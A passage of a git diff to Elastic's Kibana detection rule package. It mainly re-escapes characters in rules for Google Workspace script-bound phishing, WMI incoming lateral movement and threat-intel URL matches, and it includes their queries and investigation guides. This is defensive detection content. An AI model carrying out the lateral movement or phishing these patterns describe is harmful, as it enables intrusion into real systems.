incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n - Resetting passwords will revoke OAuth tokens which could have been stolen.\n- Reactivate multi-factor authentication for the user.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security defaults [provided by Google](https://cloud.google.com/security-command-center/docs/how-to-investigate-threats).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n## Setup\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "sequence by source.user.email with maxspan=3m\n[file where event.dataset == \"google_workspace.drive\" and event.action == \"copy\" and\n\n /* Should only match if the object lives in a Drive that is external to the user's GWS organization */\n google_workspace.drive.owner_is_team_drive == \"false\" and google_workspace.drive.copy_type == \"external\" and\n\n /* Google Script, Forms, Sheets and Document can have container-bound scripts */\n google_workspace.drive.file.type: (\"script\", \"form\", \"spreadsheet\", \"document\")]\n\n[any where event.dataset == \"google_workspace.token\" and event.action == \"authorize\" and\n\n /* Ensures application ID references custom app in Google Workspace and not GCP */\n google_workspace.token.client.id : \"*apps.googleusercontent.com\"]\n", + "references": [ + "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one", + "https://developers.google.com/apps-script/guides/bound", + "https://support.google.com/a/users/answer/13004165#share_make_a_copy_links" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.drive.copy_type", + "type": "unknown" + }, + { + "ecs": false, + "name": "google_workspace.drive.file.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.drive.owner_is_team_drive", + "type": "unknown" + }, + { + "ecs": false, + "name": "google_workspace.token.client.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.user.email", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f33e68a4-bd19-11ed-b02f-f661ea17fbcc", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "f33e68a4-bd19-11ed-b02f-f661ea17fbcc_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_1.json b/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_1.json index 062b130a079..526044a8c13 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_103.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_103.json index 6153a614b9b..c82195655fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_103.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"C:\\\\windows\\\\TEMP\\\\nessus_*.TMP\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"C:\\\\windows\\\\TEMP\\\\nessus_*.TMP\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -97,7 +97,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_104.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_104.json index f17957c8a9d..fc8ee52665f 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -97,7 +97,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_105.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_105.json index c3bb17a2ea4..b5cb69965ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -96,7 +96,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_106.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_106.json index 6833f7b3fdb..ab53b1e5246 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"*C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCM\\\\ccmrepair.exe\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"*C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCM\\\\ccmrepair.exe\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -96,7 +96,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_107.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_107.json index 9fbfd05d159..594c7964cfa 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"*C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCM\\\\ccmrepair.exe\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\",\n \"*C:\\\\windows\\\\TEMP\\\\nessus_*.TMP*\",\n \"*C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\",\n \"C:\\\\Windows\\\\CCM\\\\ccmrepair.exe\",\n \"C:\\\\Windows\\\\CCMCache\\\\*\",\n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -97,7 +97,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_108.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_108.json index 2c4af3bd343..09c231cd450 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_108.json +++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_108.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", - "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port \u003e= 49152 and destination.port \u003e= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and \n not process.Ext.token.integrity_level_name : \"system\" and not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and \n not process.executable : \n (\"?:\\\\Program Files\\\\HPWBEM\\\\Tools\\\\hpsum_swdiscovery.exe\", \n \"?:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe\", \n \"?:\\\\Windows\\\\System32\\\\wbem\\\\mofcomp.exe\", \n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\csc.exe\", \n \"?:\\\\Windows\\\\System32\\\\powercfg.exe\") and \n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"REBOOT=ReallySuppress\") and \n not (process.executable : \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\appcmd.exe\" and process.args : \"uninstall\")\n ]\n", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and \n not process.Ext.token.integrity_level_name : \"system\" and not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and \n not process.executable : \n (\"?:\\\\Program Files\\\\HPWBEM\\\\Tools\\\\hpsum_swdiscovery.exe\", \n \"?:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe\", \n \"?:\\\\Windows\\\\System32\\\\wbem\\\\mofcomp.exe\", \n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\csc.exe\", \n \"?:\\\\Windows\\\\System32\\\\powercfg.exe\") and \n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"REBOOT=ReallySuppress\") and \n not (process.executable : \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\appcmd.exe\" and process.args : \"uninstall\")\n ]\n", "related_integrations": [ { "package": "endpoint", @@ -103,7 +103,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_101.json b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_101.json index bd8bda9bee0..e1dd9cddcd7 100644 --- a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_101.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_102.json b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_102.json index 0d4826bfee4..0137d3a5dd6 100644 --- a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_102.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_103.json b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_103.json index f55bc658043..5e5b4055057 100644 --- a/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f37f3054-d40b-49ac-aa9b-a786c74c58b8_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_1.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_1.json index fa9b0b5c619..9ba3c3fb964 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_1.json @@ -128,7 +128,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.url.full:* or threat.indicator.url.domain:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.url.full:* or threat.indicator.url.domain:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_2.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_2.json index c9cf6290623..894ebb41934 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_2.json @@ -125,7 +125,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_3.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_3.json index 1fafb7fb47f..bf9bc7a5b41 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_3.json @@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel URL Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware 